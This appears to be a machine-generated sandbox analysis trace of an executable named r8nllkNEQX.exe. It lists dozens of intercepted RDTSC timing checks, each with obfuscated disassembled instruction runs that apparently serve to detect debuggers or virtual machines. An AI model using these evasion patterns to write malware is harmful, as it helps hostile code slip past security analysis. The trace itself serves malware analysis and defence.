Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4DFB3 second address: C4DFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C4DFB7 second address: C4DFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C51C75 second address: C51C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C5BE29 second address: C5BE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C5BE2F second address: C5BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B7466Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C6101B second address: C6103B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ch 0x00000007 jmp 00007FFB28DE2A0Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C635B1 second address: C635BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C635BE second address: C635C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C66C53 second address: C66C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C66C57 second address: C66C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: B9A22D second address: B9A233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: B9A233 second address: B9A24D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: B9A24D second address: B9A26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Dh 0x00000009 jmp 00007FFB28B7466Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: B9A26C second address: B9A292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB28DE2A12h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: B9A292 second address: B9A296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C731EC second address: C7320D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFB28DE2A18h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C7303C second address: C7304C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFB28B74666h 0x0000000a jc 00007FFB28B74666h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C7304C second address: C73050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C749A4 second address: C749A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C749A8 second address: C749AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C775D9 second address: C775F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28B74676h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C775F7 second address: C77620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A18h 0x00000007 jmp 00007FFB28DE2A0Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C77620 second address: C7764E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74675h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFB28B74675h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C7F1B2 second address: C7F1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7F1BA second address: C7F1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007FFB28B74666h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007FFB28B7466Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7F1D5 second address: C7F1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A0Eh 0x0000000d jbe 00007FFB28DE2A06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803BF second address: C803C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803C5 second address: C803D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFB28DE2A0Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803D8 second address: C803FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74678h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803FA second address: C80404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C80404 second address: C80435 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28B74666h 0x00000008 jl 00007FFB28B74666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 js 00007FFB28B7468Ch 0x00000017 je 00007FFB28B74676h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C83D90 second address: C83D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C83D94 second address: C83D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C83D98 second address: C83D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FC8 second address: CC0FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FFB28B74666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FD4 second address: CC0FDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FDB second address: CC0FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FE4 second address: CC0FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC4038 second address: CC403E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC403E second address: CC4044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC4044 second address: CC4061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74679h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC4061 second address: CC4067 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CD5BA1 second address: CD5BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CD5BA7 second address: CD5BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA483C second address: DA4840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA35BE second address: DA35CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007FFB28DE2A06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA35CC second address: DA35D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3727 second address: DA3742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3742 second address: DA376E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74675h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FFB28B74671h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA376E second address: DA37A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB28DE2A16h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FFB28DE2A17h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA37A8 second address: DA37C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B7466Ch 0x00000009 popad 0x0000000a jno 00007FFB28B74668h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA37C1 second address: DA37C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA38FB second address: DA3915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB28B74670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3915 second address: DA3919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3919 second address: DA3923 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3923 second address: DA3929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3929 second address: DA3934 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FFB28B74666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3934 second address: DA393F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA393F second address: DA3943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3943 second address: DA395F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007FFB28DE2A06h 0x00000011 jp 00007FFB28DE2A06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA395F second address: DA3972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B7466Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3972 second address: DA3976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3976 second address: DA397C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA397C second address: DA3982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3982 second address: DA398C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFB28B74666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3AD1 second address: DA3AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA40EB second address: DA4106 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFB28B74668h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFB28B7466Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA422C second address: DA4232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA4232 second address: DA4240 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFB28B74666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA4527 second address: DA452D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA452D second address: DA453A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FFB28B7466Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA453A second address: DA453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA453E second address: DA4560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFB28B74677h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA7483 second address: DA74D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFB28DE2A0Fh 0x0000000a popad 0x0000000b nop 0x0000000c and dl, 00000000h 0x0000000f push 00000004h 0x00000011 mov edx, 5F840100h 0x00000016 call 00007FFB28DE2A09h 0x0000001b jmp 00007FFB28DE2A14h 0x00000020 push eax 0x00000021 jne 00007FFB28DE2A14h 0x00000027 pushad 0x00000028 jng 00007FFB28DE2A06h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA74D0 second address: DA7529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007FFB28B7466Eh 0x0000000f jmp 00007FFB28B7466Ah 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 ja 00007FFB28B74679h 0x0000001d jp 00007FFB28B74673h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FFB28B74673h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA7529 second address: DA7531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA7743 second address: DA777A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+12A32486h] 0x0000000e push dword ptr [ebp+12BB3252h] 0x00000014 mov edx, dword ptr [ebp+12A338F5h] 0x0000001a call 00007FFB28B74669h 0x0000001f jmp 00007FFB28B7466Eh 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA777A second address: DA777E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA8A71 second address: DA8A83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FFB28B7466Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DAC256 second address: DAC25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0023 second address: 70C008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFB28B74678h 0x00000009 sub esi, 43C370C8h 0x0000000f jmp 00007FFB28B7466Bh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FFB28B74671h 0x00000023 pushfd 0x00000024 jmp 00007FFB28B74670h 0x00000029 add ecx, 76D17658h 0x0000002f jmp 00007FFB28B7466Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C008F second address: 70C00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00A7 second address: 70C00BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB28B7466Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00BF second address: 70C00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00C5 second address: 70C00C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00C9 second address: 70C00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C01C1 second address: 70C020D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFB28B74678h 0x00000008 sub ax, 13B8h 0x0000000d jmp 00007FFB28B7466Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 mov esi, ebx 0x00000018 pop edx 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FFB28B74671h 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C020D second address: 70C0213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0340 second address: 70C036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB28B7466Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C036C second address: 70C0371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C044F second address: 70C0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74674h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0467 second address: 70C046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C046B second address: 70C0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov edi, 7D6D8360h 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, 7FC984EAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0482 second address: 70C04A6 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FFB972A1C24h 0x0000000e jmp 00007FFB28DE2A0Dh 0x00000013 sub eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C04A6 second address: 70C04E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007FFB28B7466Eh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFB28B74677h 0x0000001a rdtsc
